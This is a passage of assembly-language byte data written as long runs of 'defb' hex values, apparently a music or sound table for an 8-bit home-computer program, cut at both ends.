$A4,$1E,$A0,$56,$28,$F0,$A5,$0D,$A1,$08,$28,$F1,$04,$02,$28,$00 defb $28,$01,$0D,$06,$A4,$1D,$A0,$A5,$28,$F0,$A5,$0E,$A1,$56,$28,$F1 defb $02,$01,$28,$00,$0B,$03,$A4,$1D,$A0,$08,$28,$F0,$02,$01,$28,$01 defb $02,$01,$28,$00,$0D,$06,$A4,$1C,$A0,$BF,$28,$F0,$A5,$0F,$A1,$89 defb $28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$1C,$A0,$3B,$28,$F0,$02,$01 defb $28,$01,$02,$01,$28,$00,$1A,$06,$A4,$1D,$A0,$A5,$28,$F0,$A5,$0C defb $A1,$BF,$28,$F1,$04,$02,$28,$00,$28,$01,$0D,$06,$A4,$1D,$A0,$08 defb $28,$F0,$A5,$0D,$A1,$A5,$28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$1C defb $A0,$BF,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00,$0D,$06,$A4,$1C defb $A0,$3B,$28,$F0,$A5,$0F,$A1,$89,$28,$F1,$02,$01,$28,$00,$0B,$03 defb $A4,$17,$A0,$89,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00,$08,$06 defb $A4,$1C,$A0,$3B,$28,$F0,$A5,$0D,$A1,$08,$28,$F1,$02,$01,$28,$00 defb $08,$03,$A4,$1C,$A0,$BF,$28,$F0,$02,$01,$28,$00,$06,$03,$A4,$1D defb $A0,$08,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00,$1A,$06,$A4,$15 defb $A0,$A5,$28,$F0,$A5,$0D,$A1,$A5,$28,$F1,$04,$02,$28,$00,$28,$01 defb $1A,$06,$A4,$17,$A0,$1D,$28,$F0,$A5,$0D,$A1,$A5,$28,$F1,$04,$02 defb $28,$00,$28,$01,$1A,$06,$A4,$17,$A0,$89,$28,$F0,$A5,$0F,$A1,$89 defb $28,$F1,$04,$01,$28,$01,$1A,$03,$A5,$0D,$A1,$A5,$28,$F1,$04,$01 defb $28,$01,$12,$03,$A5,$07,$A1,$89,$28,$F1,$08,$01,$28,$00,$04,$01 defb $28,$01,$0D,$06,$A4,$17,$A0,$89,$28,$F0,$A5,$0F,$A1,$89,$28,$F1 defb $02,$01,$28,$00,$0D,$03,$A4,$1C,$A0,$BF,$28,$F0,$02,$01,$28,$00 defb $0D,$03,$A4,$1D,$A0,$A5,$28,$F0,$02,$01,$28,$00,$07,$03,$A4,$1F defb $A0,$89,$28,$F0,$06,$01,$28,$01,$02,$01,$28,$00,$0D,$06,$A4,$1C defb $A0,$3B,$28,$F0,$A5,$0D,$A1,$A5,$28,$F1,$02,$01,$28,$00,$0B,$03 defb $A4,$1F,$A0,$1D,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00,$0D,$06 defb $A4,$1F,$A0,$89,$28,$F0,$A5,$07,$A1,$89,$28,$F1,$02,$01,$28,$01 defb $0B,$03,$A5,$0C,$A1,$BF,$28,$F1,$02,$01,$28,$00,$02,$01,$28,$01 defb $0D,$06,$A4,$17,$A0,$89,$28,$F0,$A5,$0D,$A1,$A5,$28,$F1,$02,$01 defb $28,$01,$0B,$03,$A5,$0F,$A1,$89,$28,$F1,$02,$01,$28,$00,$02,$01 defb $28,$01,$0D,$06,$A4,$17,$A0,$89,$28,$F0,$A5,$0D,$A1,$A5,$28,$F1 defb $02,$01,$28,$01,$0B,$03,$A5,$0C,$A1,$BF,$28,$F1,$02,$01,$28,$00 defb $02,$01,$28,$01,$0D,$06,$A4,$17,$A0,$89,$28,$F0,$A5,$07,$A1,$89 defb $28,$F1,$02,$01,$28,$00,$0D,$03,$A4,$1C,$A0,$BF,$28,$F0,$02,$01 defb $28,$00,$0D,$03,$A4,$1D,$A0,$A5,$28,$F0,$02,$01,$28,$00,$07,$03 defb $A4,$1F,$A0,$89,$28,$F0,$06,$01,$28,$01,$02,$01,$28,$00,$0D,$06 defb $A4,$1C,$A0,$3B,$28,$F0,$A5,$0D,$A1,$A5,$28,$F1,$02,$01,$28,$00 defb $0B,$03,$A4,$1F,$A0,$1D,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00 defb $0D,$06,$A4,$1F,$A0,$89,$28,$F0,$A5,$07,$A1,$89,$28,$F1,$02,$01 defb $28,$01,$0B,$03,$A5,$0C,$A1,$BF,$28,$F1,$02,$01,$28,$00,$02,$01 defb $28,$01,$0D,$06,$A4,$17,$A0,$89,$28,$F0,$A5,$0D,$A1,$A5,$28,$F1 defb $02,$01,$28,$01,$0B,$03,$A5,$0F,$A1,$89,$28,$F1,$02,$01,$28,$00 defb $02,$01,$28,$01,$0D,$06,$A4,$17,$A0,$89,$28,$F0,$A5,$0D,$A1,$A5 defb $28,$F1,$02,$01,$28,$01,$0B,$03,$A5,$0C,$A1,$BF,$28,$F1,$02,$01 defb $28,$00,$02,$01,$28,$01,$1A,$06,$A4,$1E,$A0,$56,$28,$F0,$A5,$0D defb $A1,$08,$28,$F1,$04,$02,$28,$00,$28,$01,$1A,$06,$A4,$1E,$A0,$56 defb $28,$F0,$A5,$0F,$A1,$89,$28,$F1,$04,$02,$28,$00,$28,$01,$0D,$06 defb $A4,$1E,$A0,$56,$28,$F0,$A5,$0D,$A1,$08,$28,$F1,$02,$01,$28,$00 defb $0B,$03,$A4,$1F,$A0,$89,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00 defb $1A,$06,$A4,$1D,$A0,$A5,$28,$F0,$A5,$0C,$A1,$BF,$28,$F1,$04,$02 defb $28,$00,$28,$01,$1A,$06,$A4,$1D,$A0,$A5,$28,$F0,$A5,$0F,$A1,$89 defb $28,$F1,$04,$02,$28,$00,$28,$01,$0D,$06,$A4,$1D,$A0,$A5,$28,$F0 defb $A5,$0C,$A1,$BF,$28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$1F,$A0,$89 defb $28,$F0,$02,$01,$28,$01,$02,$01,$28,$00,$1A,$06,$A4,$1D,$A0,$08 defb $28,$F0,$A5,$0C,$A1,$3B,$28,$F1,$04,$02,$28,$00,$28,$01,$0D,$06 defb $A4,$1D,$A0,$A5,$28,$F0,$A5,$0F,$A1,$1D,$28,$F1,$02,$01,$28,$00 defb $0B,$03,$A4,$1D,$A0,$08,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00 defb $0D,$06,$A4,$1C,$A0,$BF,$28,$F0,$A5,$0F,$A1,$89,$28,$F1,$02,$01 defb $28,$00,$0B,$03,$A4,$1D,$A0,$08,$28,$F0,$02,$01,$28,$01,$02,$01 defb $28,$00,$0D,$06,$A4,$1C,$A0,$3B,$28,$F0,$A5,$0D,$A1,$A5,$28,$F1 defb $02,$01,$28,$01,$0D,$03,$A5,$0E,$A1,$56,$28,$F1,$02,$01,$28,$01 defb $0D,$03,$A5,$0F,$A1,$1D,$28,$F1,$02,$01,$28,$01,$0D,$03,$A5,$0D defb $A1,$A5,$28,$F1,$02,$01,$28,$01,$0D,$03,$A5,$0E,$A1,$56,$28,$F1 defb $02,$01,$28,$01,$03,$03,$A5,$0F,$A1,$1D,$28,$F1,$0A,$01,$28,$00 defb $02,$01,$28,$01,$0D,$06,$A4,$17,$A0,$89,$28,$F0,$A5,$0F,$A1,$89 defb $28,$F1,$02,$01,$28,$00,$0D,$03,$A4,$1C,$A0,$BF,$28,$F0,$02,$01 defb $28,$00,$0D,$03,$A4,$1D,$A0,$A5,$28,$F0,$02,$01,$28,$00,$07,$03 defb $A4,$1F,$A0,$89,$28,$F0,$06,$01,$28,$01,$02,$01,$28,$00,$0D,$06 defb $A4,$1C,$A0,$3B,$28,$F0,$A5,$0D,$A1,$A5,$28,$F1,$02,$01,$28,$00 defb $0B,$03,$A4,$1F,$A0,$1D,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00 defb $0D,$06,$A4,$1F,$A0,$89,$28,$F0,$A5,$07,$A1,$89,$28,$F1,$02,$01 defb $28,$01,$0B,$03,$A5,$0C,$A1,$BF,$28,$F1,$02,$01,$28,$00,$02,$01 defb $28,$01,$0D,$06,$A4,$17,$A0,$89,$28,$F0,$A5,$0D,$A1,$A5,$28,$F1 defb $02,$01,$28,$01,$0B,$03,$A5,$0F,$A1,$89,$28,$F1,$02,$01,$28,$00 defb $02,$01,$28,$01,$0D,$06,$A4,$17,$A0,$89,$28,$F0,$A5,$0D,$A1,$A5 defb $28,$F1,$02,$01,$28,$01,$0B,$03,$A5,$0C,$A1,$BF,$28,$F1,$02,$01 defb $28,$00,$02,$01,$28,$01,$0D,$06,$A4,$17,$A0,$89,$28,$F0,$A5,$07 defb $A1,$89,$28,$F1,$02,$01,$28,$00,$0D,$03,$A4,$1C,$A0,$BF,$28,$F0 defb $02,$01,$28,$00,$0D,$03,$A4,$1D,$A0,$A5,$28,$F0,$02,$01,$28,$00 defb $07,$03,$A4,$1F,$A0,$89,$28,$F0,$06,$01,$28,$01,$02,$01,$28,$00 defb $0D,$06,$A4,$1C,$A0,$3B,$28,$F0,$A5,$0D,$A1,$A5,$28,$F1,$02,$01 defb $28,$00,$0B,$03,$A4,$1F,$A0,$1D,$28,$F0,$02,$01,$28,$01,$02,$01 defb $28,$00,$0D,$06,$A4,$1F,$A0,$89,$28,$F0,$A5,$07,$A1,$89,$28,$F1 defb $02,$01,$28,$01,$0B,$03,$A5,$0C,$A1,$BF,$28,$F1,$02,$01,$28,$00 defb $02,$01,$28,$01,$0D,$06,$A4,$17,$A0,$89,$28,$F0,$A5,$0D,$A1,$A5 defb $28,$F1,$02,$01,$28,$01,$0B,$03,$A5,$0F,$A1,$89,$28,$F1,$02,$01 defb $28,$00,$02,$01,$28,$01,$0D,$06,$A4,$17,$A0,$89,$28,$F0,$A5,$0D defb $A1,$A5,$28,$F1,$02,$01,$28,$01,$0B,$03,$A5,$0C,$A1,$BF,$28,$F1 defb $02,$01,$28,$00,$02,$01,$28,$01,$1A,$06,$A4,$1E,$A0,$56,$28,$F0 defb $A5,$0D,$A1,$08,$28,$F1,$04,$02,$28,$00,$28,$01,$0D,$06,$A4,$1D defb $A0,$A5,$28,$F0,$A5,$0E,$A1,$56,$28,$F1,$02,$01,$28,$00,$0B,$03 defb $A4,$1D,$A0,$08,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00,$0D,$06 defb $A4,$1C,$A0,$BF,$28,$F0,$A5,$0F,$A1,$89,$28,$F1,$02,$01,$28,$00 defb $0B,$03,$A4,$1C,$A0,$3B,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00 defb $1A,$06,$A4,$1D,$A0,$A5,$28,$F0,$A5,$0C,$A1,$BF,$28,$F1,$04,$02 defb $28,$00,$28,$01,$0D,$06,$A4,$1D,$A0,$08,$28,$F0,$A5,$0D,$A1,$A5 defb $28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$1C,$A0,$BF,$28,$F0,$02,$01 defb $28,$01,$02,$01,$28,$00,$0D,$06,$A4,$1C,$A0,$3B,$28,$F0,$A5,$0F defb $A1,$89,$28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$17,$A0,$89,$28,$F0 defb $02,$01,$28,$01,$02,$01,$28,$00,$08,$06,$A4,$1C,$A0,$3B,$28,$F0 defb $A5,$0D,$A1,$08,$28,$F1,$02,$01,$28,$00,$08,$03,$A4,$1C,$A0,$BF defb $28,$F0,$02,$01,$28,$00,$06,$03,$A4,$1D,$A0,$08,$28,$F0,$02,$01 defb $28,$01,$02,$01,$28,$00,$1A,$06,$A4,$15,$A0,$A5,$28,$F0,$A5,$0D defb $A1,$A5,$28,$F1,$04,$02,$28,$00,$28,$01,$1A,$06,$A4,$17,$A0,$1D defb $28,$F0,$A5,$0D,$A1,$A5,$28,$F1,$04,$02,$28,$00,$28,$01,$1A,$06 defb $A4,$17,$A0,$89,$28,$F0,$A5,$0F,$A1,$89,$28,$F1,$04,$01,$28,$01 defb $1A,$03,$A5,$0D,$A1,$A5,$28,$F1,$04,$01,$28,$01,$12,$03,$A5,$07 defb $A1,$89,$28,$F1,$08,$01,$28,$00,$04,$01,$28,$01,$0D,$06,$A4,$17 defb $A0,$89,$28,$F0,$A5,$0E,$A1,$56,$28,$F1,$02,$01,$28,$00,$0B,$03 defb $A4,$1C,$A0,$3B,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00,$0D,$06 defb $A4,$1C,$A0,$BF,$28,$F0,$A5,$0D,$A1,$FB,$28,$F1,$02,$01,$28,$00 defb $0B,$03,$A4,$1C,$A0,$3B,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00 defb $0D,$06,$A4,$17,$A0,$89,$28,$F0,$A5,$0C,$A1,$BF,$28,$F1,$02,$01 defb $28,$00,$0B,$03,$A4,$17,$A0,$1D,$28,$F0,$02,$01,$28,$01,$02,$01 defb $28,$00,$1A,$06,$A4,$17,$A0,$89,$28,$F0,$A5,$0E,$A1,$56,$28,$F1 defb $04,$02,$28,$00,$28,$01,$1A,$06,$A4,$16,$A0,$56,$28,$F0,$A5,$0C defb $A1,$BF,$28,$F1,$04,$02,$28,$00,$28,$01,$1A,$06,$A4,$16,$A0,$56 defb $28,$F0,$A5,$06,$A1,$56,$28,$F1,$04,$02,$28,$00,$28,$01,$0D,$06 defb $A4,$1F,$A0,$89,$28,$F0,$A5,$0E,$A1,$56,$28,$F1,$02,$01,$28,$00 defb $0B,$03,$A4,$1F,$A0,$1D,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00 defb $0D,$06,$A4,$1E,$A0,$56,$28,$F0,$A5,$0F,$A1,$89,$28,$F1,$02,$01 defb $28,$00,$0B,$03,$A4,$1F,$A0,$89,$28,$F0,$02,$01,$28,$01,$02,$01 defb $28,$00,$0D,$06,$A4,$1F,$A0,$1D,$28,$F0,$A5,$14,$A1,$BF,$28,$F1 defb $02,$01,$28,$00,$0B,$03,$A4,$1E,$A0,$56,$28,$F0,$02,$01,$28,$01 defb $02,$01,$28,$00,$0D,$06,$A4,$1F,$A0,$1D,$28,$F0,$A5,$0C,$A1,$BF defb $28,$F1,$02,$01,$28,$01,$0B,$03,$A5,$0D,$A1,$FB,$28,$F1,$02,$01 defb $28,$00,$02,$01,$28,$01,$0D,$06,$A4,$1C,$A0,$BF,$28,$F0,$A5,$0F defb $A1,$1D,$28,$F1,$02,$01,$28,$01,$0B,$03,$A5,$14,$A1,$BF,$28,$F1 defb $02,$01,$28,$00,$02,$01,$28,$01,$0D,$06,$A4,$1C,$A0,$BF,$28,$F0 defb $A5,$0F,$A1,$1D,$28,$F1,$02,$01,$28,$01,$0B,$03,$A5,$0D,$A1,$FB defb $28,$F1,$02,$01,$28,$00,$02,$01,$28,$01,$0D,$06,$A4,$1F,$A0,$89 defb $28,$F0,$A5,$0E,$A1,$56,$28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$1F defb $A0,$1D,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00,$0D,$06,$A4,$1E defb $A0,$56,$28,$F0,$A5,$0F,$A1,$89,$28,$F1,$02,$01,$28,$00,$0B,$03 defb $A4,$1F,$A0,$89,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00,$0D,$06 defb $A4,$1F,$A0,$1D,$28,$F0,$A5,$14,$A1,$BF,$28,$F1,$02,$01,$28,$00 defb $0B,$03,$A4,$1E,$A0,$56,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00 defb $1A,$06,$A4,$1F,$A0,$1D,$28,$F0,$A5,$0C,$A1,$BF,$28,$F1,$04,$02 defb $28,$00,$28,$01,$1A,$06,$A4,$1C,$A0,$BF,$28,$F0,$A5,$14,$A1,$3B defb $28,$F1,$04,$02,$28,$00,$28,$01,$1A,$06,$A4,$1E,$A0,$56,$28,$F0 defb $A5,$0F,$A1,$89,$28,$F1,$04,$02,$28,$00,$28,$01,$08,$06,$A4,$1F defb $A0,$1D,$28,$F0,$A5,$14,$A1,$3B,$28,$F1,$02,$01,$28,$00,$08,$03 defb $A4,$1F,$A0,$89,$28,$F0,$02,$01,$28,$00,$06,$03,$A4,$24,$A0,$3B defb $28,$F0,$02,$01,$28,$01,$02,$01,$28,$00,$1A,$06,$A4,$1C,$A0,$BF defb $28,$F0,$A5,$14,$A1,$BF,$28,$F1,$04,$02,$28,$00,$28,$01,$1A,$06 defb $A4,$1D,$A0,$FB,$28,$F0,$A5,$0C,$A1,$BF,$28,$F1,$04,$02,$28,$00 defb $28,$01,$1A,$06,$A4,$1E,$A0,$56,$28,$F0,$A5,$0E,$A1,$56,$28,$F1 defb $04,$01,$28,$00,$0D,$03,$A4,$1D,$A0,$FB,$28,$F0,$02,$01,$28,$00 defb $0D,$03,$A4,$1E,$A0,$56,$28,$F0,$02,$01,$28,$00,$12,$03,$A4,$1F defb $A0,$1D,$28,$F0,$08,$01,$28,$01,$04,$01,$28,$00,$1A,$06,$A4,$1F defb $A0,$89,$28,$F0,$A5,$0C,$A1,$BF,$28,$F1,$04,$02,$28,$00,$28,$01 defb $0D,$06,$A4,$1F,$A0,$89,$28,$F0,$A5,$0D,$A1,$A5,$28,$F1,$02,$01 defb $28,$00,$0B,$03,$A4,$1F,$A0,$1D,$28,$F0,$02,$01,$28,$01,$02,$01 defb $28,$00,$0D,$06,$A4,$1E,$A0,$56,$28,$F0,$A5,$0F,$A1,$89,$28,$F1 defb $02,$01,$28,$00,$0B,$03,$A4,$1D,$A0,$A5,$28,$F0,$02,$01,$28,$01 defb $02,$01,$28,$00,$1A,$06,$A4,$1E,$A0,$56,$28,$F0,$A5,$0D,$A1,$08 defb $28,$F1,$04,$02,$28,$00,$28,$01,$0D,$06,$A4,$1E,$A0,$56,$28,$F0 defb $A5,$0D,$A1,$A5,$28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$1D,$A0,$A5 defb $28,$F0,$02,$01,$28,$01,$02,$01,$28,$00,$0D,$06,$A4,$1D,$A0,$08 defb $28,$F0,$A5,$0E,$A1,$56,$28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$1C defb $A0,$BF,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00,$1A,$06,$A4,$1D defb $A0,$08,$28,$F0,$A5,$0C,$A1,$3B,$28,$F1,$04,$02,$28,$00,$28,$01 defb $0D,$06,$A4,$1D,$A0,$08,$28,$F0,$A5,$0C,$A1,$BF,$28,$F1,$02,$01 defb $28,$00,$0B,$03,$A4,$1C,$A0,$BF,$28,$F0,$02,$01,$28,$01,$02,$01 defb $28,$00,$0D,$06,$A4,$1C,$A0,$3B,$28,$F0,$A5,$0D,$A1,$08,$28,$F1 defb $02,$01,$28,$00,$0B,$03,$A4,$17,$A0,$89,$28,$F0,$02,$01,$28,$01 defb $02,$01,$28,$00,$1A,$06,$A4,$17,$A0,$1D,$28,$F0,$A5,$0D,$A1,$A5 defb $28,$F1,$04,$02,$28,$00,$28,$01,$0D,$06,$A4,$16,$A0,$56,$28,$F0 defb $A5,$0C,$A1,$3B,$28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$17,$A0,$1D defb $28,$F0,$02,$01,$28,$01,$02,$01,$28,$00,$1A,$06,$A4,$15,$A0,$A5 defb $28,$F0,$A5,$05,$A1,$A5,$28,$F1,$04,$02,$28,$00,$28,$01,$0D,$06 defb $A4,$1C,$A0,$3B,$28,$F0,$A5,$0F,$A1,$1D,$28,$F1,$02,$01,$28,$01 defb $0B,$03,$A5,$0D,$A1,$A5,$28,$F1,$02,$01,$28,$00,$02,$01,$28,$01 defb $0D,$06,$A4,$15,$A0,$A5,$28,$F0,$A5,$0F,$A1,$1D,$28,$F1,$02,$01 defb $28,$01,$0B,$03,$A5,$0D,$A1,$A5,$28,$F1,$02,$01,$28,$00,$02,$01 defb $28,$01,$0D,$06,$A4,$15,$A0,$A5,$28,$F0,$A5,$0F,$A1,$1D,$28,$F1 defb $02,$01,$28,$01,$0B,$03,$A5,$0D,$A1,$A5,$28,$F1,$02,$01,$28,$00 defb $02,$01,$28,$01,$0D,$06,$A4,$1C,$A0,$BF,$28,$F0,$A5,$0F,$A1,$89 defb $28,$F1,$02,$01,$28,$01,$0B,$03,$A5,$0D,$A1,$A5,$28,$F1,$02,$01 defb $28,$00,$02,$01,$28,$01,$0D,$06,$A4,$15,$A0,$A5,$28,$F0,$A5,$0F defb $A1,$89,$28,$F1,$02,$01,$28,$01,$0B,$03,$A5,$0D,$A1,$A5,$28,$F1 defb $02,$01,$28,$00,$02,$01,$28,$01,$0D,$06,$A4,$15,$A0,$A5,$28,$F0 defb $A5,$0F,$A1,$89,$28,$F1,$02,$01,$28,$01,$0B,$03,$A5,$0D,$A1,$A5 defb $28,$F1,$02,$01,$28,$00,$02,$01,$28,$01,$1A,$06,$A4,$1D,$A0,$08 defb $28,$F0,$A5,$0F,$A1,$1D,$28,$F1,$04,$02,$28,$00,$28,$01,$0D,$06 defb $A4,$1D,$A0,$A5,$28,$F0,$A5,$0D,$A1,$A5,$28,$F1,$02,$01,$28,$00 defb $0B,$03,$A4,$1D,$A0,$08,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00 defb $0D,$06,$A4,$1C,$A0,$BF,$28,$F0,$A5,$0F,$A1,$89,$28,$F1,$02,$01 defb $28,$00,$0B,$03,$A4,$1D,$A0,$08,$28,$F0,$02,$01,$28,$01,$02,$01 defb $28,$00,$0D,$06,$A4,$1C,$A0,$3B,$28,$F0,$A5,$0D,$A1,$A5,$28,$F1 defb $02,$01,$28,$01,$0D,$03,$A5,$0E,$A1,$56,$28,$F1,$02,$01,$28,$01 defb $0D,$03,$A5,$0F,$A1,$1D,$28,$F1,$02,$01,$28,$01,$0D,$03,$A5,$0D defb $A1,$A5,$28,$F1,$02,$01,$28,$01,$0D,$03,$A5,$0E,$A1,$56,$28,$F1 defb $02,$01,$28,$01,$03,$03,$A5,$0F,$A1,$1D,$28,$F1,$0A,$01,$28,$00 defb $02,$01,$28,$01,$0D,$06,$A4,$17,$A0,$89,$28,$F0,$A5,$0F,$A1,$89 defb $28,$F1,$02,$01,$28,$00,$0D,$03,$A4,$1C,$A0,$BF,$28,$F0,$02,$01 defb $28,$00,$0D,$03,$A4,$1D,$A0,$A5,$28,$F0,$02,$01,$28,$00,$07,$03 defb $A4,$1F,$A0,$89,$28,$F0,$06,$01,$28,$01,$02,$01,$28,$00,$0D,$06 defb $A4,$1C,$A0,$3B,$28,$F0,$A5,$0D,$A1,$A5,$28,$F1,$02,$01,$28,$00 defb $0B,$03,$A4,$1F,$A0,$1D,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00 defb $0D,$06,$A4,$1F,$A0,$89,$28,$F0,$A5,$07,$A1,$89,$28,$F1,$02,$01 defb $28,$01,$0B,$03,$A5,$0C,$A1,$BF,$28,$F1,$02,$01,$28,$00,$02,$01 defb $28,$01,$0D,$06,$A4,$17,$A0,$89,$28,$F0,$A5,$0D,$A1,$A5,$28,$F1 defb $02,$01,$28,$01,$0B,$03,$A5,$0F,$A1,$89,$28,$F1,$02,$01,$28,$00 defb $02,$01,$28,$01,$0D,$06,$A4,$17,$A0,$89,$28,$F0,$A5,$0D,$A1,$A5 defb $28,$F1,$02,$01,$28,$01,$0B,$03,$A5,$0C,$A1,$BF,$28,$F1,$02,$01 defb $28,$00,$02,$01,$28,$01,$0D,$06,$A4,$17,$A0,$89,$28,$F0,$A5,$07 defb $A1,$89,$28,$F1,$02,$01,$28,$00,$0D,$03,$A4,$1C,$A0,$BF,$28,$F0 defb $02,$01,$28,$00,$0D,$03,$A4,$1D,$A0,$A5,$28,$F0,$02,$01,$28,$00 defb $07,$03,$A4,$1F,$A0,$89,$28,$F0,$06,$01,$28,$01,$02,$01,$28,$00 defb $0D,$06,$A4,$1C,$A0,$3B,$28,$F0,$A5,$0D,$A1,$A5,$28,$F1,$02,$01 defb $28,$00,$0B,$03,$A4,$1F,$A0,$1D,$28,$F0,$02,$01,$28,$01,$02,$01 defb $28,$00,$0D,$06,$A4,$1F,$A0,$89,$28,$F0,$A5,$07,$A1,$89,$28,$F1 defb $02,$01,$28,$01,$0B,$03,$A5,$0C,$A1,$BF,$28,$F1,$02,$01,$28,$00 defb $02,$01,$28,$01,$0D,$06,$A4,$17,$A0,$89,$28,$F0,$A5,$0D,$A1,$A5 defb $28,$F1,$02,$01,$28,$01,$0B,$03,$A5,$0F,$A1,$89,$28,$F1,$02,$01 defb $28,$00,$02,$01,$28,$01,$0D,$06,$A4,$17,$A0,$89,$28,$F0,$A5,$0D defb $A1,$A5,$28,$F1,$02,$01,$28,$01,$0B,$03,$A5,$0C,$A1,$BF,$28,$F1 defb $02,$01,$28,$00,$02,$01,$28,$01,$1A,$06,$A4,$1E,$A0,$56,$28,$F0 defb $A5,$0D,$A1,$08,$28,$F1,$04,$02,$28,$00,$28,$01,$0D,$06,$A4,$1D defb $A0,$A5,$28,$F0,$A5,$0E,$A1,$56,$28,$F1,$02,$01,$28,$00,$0B,$03 defb $A4,$1D,$A0,$08,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00,$0D,$06 defb $A4,$1C,$A0,$BF,$28,$F0,$A5,$0F,$A1,$89,$28,$F1,$02,$01,$28,$00 defb $0B,$03,$A4,$1C,$A0,$3B,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00 defb $1A,$06,$A4,$1D,$A0,$A5,$28,$F0,$A5,$0C,$A1,$BF,$28,$F1,$04,$02 defb $28,$00,$28,$01,$0D,$06,$A4,$1D,$A0,$08,$28,$F0,$A5,$0D,$A1,$A5 defb $28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$1C,$A0,$BF,$28,$F0,$02,$01 defb $28,$01,$02,$01,$28,$00,$0D,$06,$A4,$1C,$A0,$3B,$28,$F0,$A5,$0F defb $A1,$89,$28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$17,$A0,$89,$28,$F0 defb $02,$01,$28,$01,$02,$01,$28,$00,$0D,$06,$A4,$1C,$A0,$3B,$28,$F0 defb $A5,$0D,$A1,$08,$28,$F1,$02,$01,$28,$00,$0D,$03,$A4,$1C,$A0,$BF defb $28,$F0,$02,$01,$28,$00,$16,$03,$A4,$15,$A0,$A5,$28,$F0,$04,$01 defb $28,$01,$04,$01,$28,$00,$1A,$06,$A4,$17,$A0,$1D,$28,$F0,$A5,$0D defb $A1,$A5,$28,$F1,$04,$02,$28,$00,$28,$01,$1A,$06,$A4,$17,$A0,$89 defb $28,$F0,$A5,$0F,$A1,$89,$28,$F1,$04,$01,$28,$01,$1A,$03,$A5,$0D defb $A1,$A5,$28,$F1,$04,$01,$28,$01,$12,$03,$A5,$07,$A1,$89,$28,$F1 defb $08,$01,$28,$00,$04,$01,$28,$01,$0D,$06,$A4,$17,$A0,$89,$28,$F0 defb $A5,$0E,$A1,$56,$28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$1C,$A0,$3B defb $28,$F0,$02,$01,$28,$01,$02,$01,$28,$00,$0D,$06,$A4,$1C,$A0,$BF defb $28,$F0,$A5,$0D,$A1,$FB,$28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$1C defb $A0,$3B,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00,$0D,$06,$A4,$17 defb $A0,$89,$28,$F0,$A5,$0C,$A1,$BF,$28,$F1,$02,$01,$28,$00,$0B,$03 defb $A4,$17,$A0,$1D,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00,$1A,$06 defb $A4,$17,$A0,$89,$28,$F0,$A5,$0E,$A1,$56,$28,$F1,$04,$02,$28,$00 defb $28,$01,$1A,$06,$A4,$16,$A0,$56,$28,$F0,$A5,$0C,$A1,$BF,$28,$F1 defb $04,$02,$28,$00,$28,$01,$1A,$06,$A4,$16,$A0,$56,$28,$F0,$A5,$06 defb $A1,$56,$28,$F1,$04,$02,$28,$00,$28,$01,$0D,$06,$A4,$1F,$A0,$89 defb $28,$F0,$A5,$0E,$A1,$56,$28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$1F defb $A0,$1D,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00,$0D,$06,$A4,$1E defb $A0,$56,$28,$F0,$A5,$0F,$A1,$89,$28,$F1,$02,$01,$28,$00,$0B,$03 defb $A4,$1F,$A0,$89,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00,$0D,$06 defb $A4,$1F,$A0,$1D,$28,$F0,$A5,$14,$A1,$BF,$28,$F1,$02,$01,$28,$00 defb $0B,$03,$A4,$1E,$A0,$56,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00 defb $0D,$06,$A4,$1F,$A0,$1D,$28,$F0,$A5,$0C,$A1,$BF,$28,$F1,$02,$01 defb $28,$01,$0B,$03,$A5,$0D,$A1,$FB,$28,$F1,$02,$01,$28,$00,$02,$01 defb $28,$01,$0D,$06,$A4,$1C,$A0,$BF,$28,$F0,$A5,$0F,$A1,$1D,$28,$F1 defb $02,$01,$28,$01,$0B,$03,$A5,$14,$A1,$BF,$28,$F1,$02,$01,$28,$00 defb $02,$01,$28,$01,$0D,$06,$A4,$1C,$A0,$BF,$28,$F0,$A5,$0F,$A1,$1D defb $28,$F1,$02,$01,$28,$01,$0B,$03,$A5,$0D,$A1,$FB,$28,$F1,$02,$01 defb $28,$00,$02,$01,$28,$01,$0D,$06,$A4,$1F,$A0,$89,$28,$F0,$A5,$0E defb $A1,$56,$28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$1F,$A0,$1D,$28,$F0 defb $02,$01,$28,$01,$02,$01,$28,$00,$0D,$06,$A4,$1E,$A0,$56,$28,$F0 defb $A5,$0F,$A1,$89,$28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$1F,$A0,$89 defb $28,$F0,$02,$01,$28,$01,$02,$01,$28,$00,$0D,$06,$A4,$1F,$A0,$1D defb 